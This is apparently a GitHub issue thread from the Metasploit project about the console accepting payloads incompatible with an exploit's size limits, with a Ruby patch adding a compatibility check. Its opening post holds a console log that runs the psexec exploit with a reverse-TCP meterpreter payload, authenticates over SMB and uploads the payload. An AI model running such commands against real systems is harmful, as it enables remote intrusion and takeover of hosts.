Metasploit console allows incompatible payloads to be set and used

[hdm]

This example demonstrates how stageless meterpreter is accepted for psexec even though it is not compatible due to the payload space requirements.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter_reverse_tcp
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.0.3:4444 
[*] Connecting to the server...
[*] Authenticating to 192.168.0.6:445|WORKGROUP as user 'developer'...
[*] Uploading payload...

The show payloads command makes it clear that this payload is not valid. This should have been caught both in the set command handler and the exploit command.

[OJ]

I'll take this given that it's stageless related.

[jlee-r7]

set has never complained about an incompatible payload

[hdm]

@jlee-r7 It has complained about unknown payloads, so seems strange that it wouldn't complain about an incompatible one.

[wchen-r7]

I got a patch for you:

diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb
index 922d3c3..6a3d81e 100644
--- a/lib/msf/ui/console/driver.rb
+++ b/lib/msf/ui/console/driver.rb
@@ -571,6 +571,8 @@ class Driver < Msf::Ui::Driver

         if (framework and framework.payloads.valid?(val) == false)
           return false
+        elsif active_module.type == 'exploit' && !is_payload_compatible?(active_module, val)
+          return false
         elsif (active_module)
           active_module.datastore.clear_non_user_defined
         elsif (framework)
@@ -589,6 +591,14 @@ class Driver < Msf::Ui::Driver
     end
   end

+  def is_payload_compatible?(m, payload_name)
+    m.compatible_payloads.each do |k|
+      return true if k[0] == payload_name
+    end
+
+    false
+  end
+
   #
   # Called when a variable is unset.  If this routine returns false it is an
   # indication that the variable should not be allowed to be unset.

I may submit a PR later.

[OJ]

Thanks @wchen-r7 :)

[Meatballs1]

I was told that you could always override the compatible payloads by just typing it in manually. It wouldn't auto complete or be shown in the list of compatible payloads.

I think this currently breaks payload_inject with x64 payloads

[hdm]

@Meatballs1 Setting an incompatible payload would break most exploits (limited by size or characters). For non-exploit scenarios, the solution is to make the module accept the payload, not to allow any payload to be set.

[bcook-r7]

There is a bit of a corner case when checking for size.

When you are setting the payload, we currently check for payloads that are compatible with the default parameters. The actual parameters one sets can also affect size. Thus, there are payloads that are incompatible by default, but can be modified after they are set into being compatible, and vice-versa.